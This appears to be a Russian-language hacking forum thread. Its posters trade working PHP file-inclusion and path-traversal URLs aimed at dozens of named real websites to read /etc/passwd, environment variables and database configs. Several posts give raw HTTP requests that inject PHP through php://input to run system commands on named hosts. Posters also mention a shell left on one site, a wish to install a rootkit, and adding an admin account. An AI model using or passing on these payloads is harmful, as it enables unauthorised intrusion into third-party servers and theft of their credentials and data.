PHP Иньекции

http://www.quantum-electron.ru/pa.phtml?page=../../../../../../../../../../etc/passwd%00

 

Code:

http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00

 

Ну, собственно, и мои пять копеек

 

Code:

http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ

Code:

http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php

для последнего: https://forum.antichat.ru/showthread.php?t=71111 можно админа добавить и тупо под ним зайти

 

php://input

выполнение произвольного php - кода, редко вижу.
итак, выполняем следующие пост-запросы:

Code:

POST /index.php?link=php://input HTTP/1.1
Host: www.alternativeautosource.net
Content-Length: 19

<?php phpinfo(); ?>

Code:

POST /lang_de/main.php?view=php://input HTTP/1.1
Host: www.galvania.ca
Content-Length: 19

<?php phpinfo(); ?>

Code:

POST /page_en.php?link=php://input HTTP/1.1
Host: www.rochelle.cz
Content-Length: 19

<?php phpinfo(); ?>

и видим PHPINFO серверов

Code:

POST /WWW/main.php?CONTENT=php://input HTTP/1.1
Host: polyplast-mainz.de
Content-Length: 27

<?php system("ls -lia"); ?>

а тут листинг директории))

 

HTML:

http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00

HTML:

http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00

HTML:

http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00

 

http://www.tierheim-spanien.de/thspa.php?inc=../../../../../../../../../../etc/passwd%00

 

RFI

http://www.axode.com/en/products.php?module_catalogue_page=[/color][/B]

 

Один из крупнейших порталов по теме образования в Латвии :

Code:

http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00

 

Code:

http://www.hyaffiliates.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Code:

http://pheromore.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Code:

http://www.4xwins.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Code:

http://www.blastarticles.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Code:

http://www.attractingabundance.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Code:

http://www.parentcoachplan.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

 

http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

 

http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php

http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue

 

http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ
Кому интересно там есть шелл,
но немогу rootkit поставить нет еще сплоитов

 

http://wierzba.wzks.uj.edu.pl/~dymet/zarty/index.php?go=/etc/passwd%00

http://www.fav.co.il/index.php?dir=app_sites&page=../../../../../../../etc/hosts%00

 

http://www.equinix.com/download.php?file=../../../../../../../../../../../../../etc/passwd
http://www.hrcpa.com/press/index.php?file=../../../../../../../../../../etc/passwd (--> исходники)

 

http://www.e-ntech.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.hiro-seiko.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.mitorosso.com/index.php?p=../../../../../../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=../../../../../../../../../../etc/passwd
http://athomebirmingham.com/index.php?p=../../../../../../../../../../etc/passwd
http://www.myspacegraphicshelper.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.amarc.org/index.php?p=../../../../../../../../../../etc/passwd
http://www.madrid21comunidad.fida.es/index.php?pagina=../../../../../../../../../../proc/self/environ
удачи

 

http://www.radioexpress.com/public/content.php?loc=../../../../../../etc/my.cnf

 

PR - 1

Code:

http://www.4kidsinpa.com/index.php?option=com_jesubmit&view=../../../../../../../../../etc/passwd%00

Code:

http://www.andycon.net/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd

PR - 2

Code:

http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00

Code:

http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00

PR - 4

Code:

http://www.kommunisten.de/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

PR - 5

Code:

http://www.armnn.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

Code:

http://www.teabagfree.com/index.php/events/day.listevents/2009/11/19/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

PR - 3

Code:

http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

PR - 1

Code:

http://borchardtbrothers.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

Code:

http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

Code:

http://www.oranjportal.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

Code:

http://www.aliveinchrist.org/index.php/templates/templates/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

 

http://www.rhianna.ro/index.php?page=../../../../../../../../../../proc/self/environ
http://www.vapnet.com.br/index.php?pagina=../../../../../../../../../../proc/self/status
http://www.mutokukai.ru/iframe.php?target=../../../../../../../../../../etc/passwd

 

http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.popular-articles.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.kucha-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.articles-top.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.articlesgallery.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.top-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://monsterspray.biz/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00